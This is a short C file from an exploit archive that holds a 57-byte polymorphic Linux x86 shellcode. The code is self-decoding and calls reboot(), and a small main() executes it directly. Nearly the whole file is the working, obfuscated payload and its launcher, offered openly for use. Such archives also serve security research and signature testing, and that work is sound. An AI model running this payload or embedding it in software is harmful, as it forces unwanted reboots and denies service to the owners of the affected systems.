/*
* Title : reboot() polymorphic shellcode - 57 bytes
* Os: Linux x86
*
* Author: Jonathan Salwan - submit AT shell-storm.org
* Web: http://www.shell-storm.org
*
*
* !! Database of shellcodes => http://www.shell-storm.org/shellcode/
*
*/
#include <stdio.h>
char shellcode[] = "\xeb\x11\x5e\x31\xc9\xb1\x30\x80"
"\x6c\x0e\xff\x01\x80\xe9\x01\x75"
"\xf6\xeb\x05\xe8\xea\xff\xff\xff"
"\x32\xc1\x51\x69\x63\x70\x70\x75"
"\x69\x6f\x30\x73\x66\x69\x30\x74"
"\x63\x6a\x8a\xe4\x51\x8a\xe3\x54"
"\x8a\xe3\x54\x8a\xe2\xb1\x0c\xce"
"\x81";
int main()
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
// milw0rm.com [2009-06-29]